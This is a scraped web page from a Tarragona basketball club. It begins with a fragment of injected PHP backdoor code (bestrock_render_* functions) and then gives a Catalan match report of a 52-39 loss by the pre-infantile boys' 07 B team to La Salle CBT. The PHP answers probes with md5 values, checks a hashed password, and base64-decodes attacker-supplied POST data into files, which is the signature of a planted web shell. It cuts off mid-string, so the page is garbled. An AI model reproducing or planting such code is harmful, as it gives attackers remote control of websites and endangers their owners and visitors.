function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El preinfantil masculí 07 B es queda sense idees en atac durant 20 minuts i perd contra la Salle CBT (52-39) - Tgn Bàsquet Club -

El preinfantil masculí 07 B es queda sense idees en atac durant 20 minuts i perd contra la Salle CBT (52-39)

Updated: desembre 3, 2019

El preinfantil masculí 07 B va desaprofitar la gran feina que havia fet en els primers deu minuts de partit i va caure de forma clara a la pista de la Salle CBT. El TGN Bàsquet va fer un inici molt bo, amb una defensa intensa que li va permetre dominar el partit per 11-20. Però tot el que havia estat bon joc i concentració se’n va anar en orris quan el TGN Bàsquet va anotar només cinc punts en 20 minuts de joc, un fet que deixava el triomf en safata de plata als locals.

Els jugadors liles es van mostrar inoperants en atac durant aquells minuts, sense buscar els espais, les línies de passada i fent moltes errades en defensa. Al final, tants errors els van dur a la derrota.